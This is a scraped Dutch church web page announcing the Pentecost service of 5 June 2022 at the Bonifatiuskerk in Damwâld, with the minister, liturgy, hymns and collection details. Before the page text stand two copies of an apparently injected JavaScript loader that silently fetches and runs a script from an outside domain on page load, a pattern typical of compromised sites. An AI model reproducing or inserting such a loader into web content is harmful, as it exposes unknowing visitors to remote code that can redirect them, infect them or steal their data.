;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 5 juni 2022 14:00 uur - PKN Damwâld
zondag 5 juni 2022
14:00 uur
Eerste Pinksterdag

Kerkdienst zondag 5 juni 2022 14:00 uur

Informatie

Voorganger:Ds. G.J. Otter
Mededeling:Eerste Pinksterdag
Liturgie
Lied voor de dienst ELB 147: 1 en 3
Welkomstwoord
We zingen: NLB 672: 1 en 2
Stil Gebed, Votum en Groet
We zingen: Nlb 858: 1, 2, 3 en 4
Geloofsbelijdens
We zingen: Elb 150: 1 en 2
Gebed
We lezen: Hand. 2: 1 - 21
We zingen: Nlb 25: 2
Preek .
We zingen: Nlb 107: 1 en 9
Dankgebed en voorbede
We zingen: ELB 81: 2, 3 en 6
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Pinkstercollecte Kerk in Actie – Zending (collectenummer 22057)

Zuid-Afrika Bijbel brengt arme boeren in actie. Veel arme boeren in de Zuid-Afrikaanse provincie KwaZulu-Natal leven al generaties lang in armoede. Ze geloven niet dat hun leven ooit zal verbeteren. Een christelijke ontwikkelingsorganisatie doorbreekt deze mentaliteit door boerenfamilies te laten samenwerken. De organisatie inspireert hen met Bijbelverhalen en leert hun hoe ze met betere landbouwmethoden de voedselopbrengst kunnen verhogen. In het kader van ‘jong geleerd, oud gedaan’ investeert de organisatie juist ook in kinderen zodat er een structurele verbetering van de leefomstandigheden optreedt.

Uitganscollecte: Bij de uitgang of via QR-code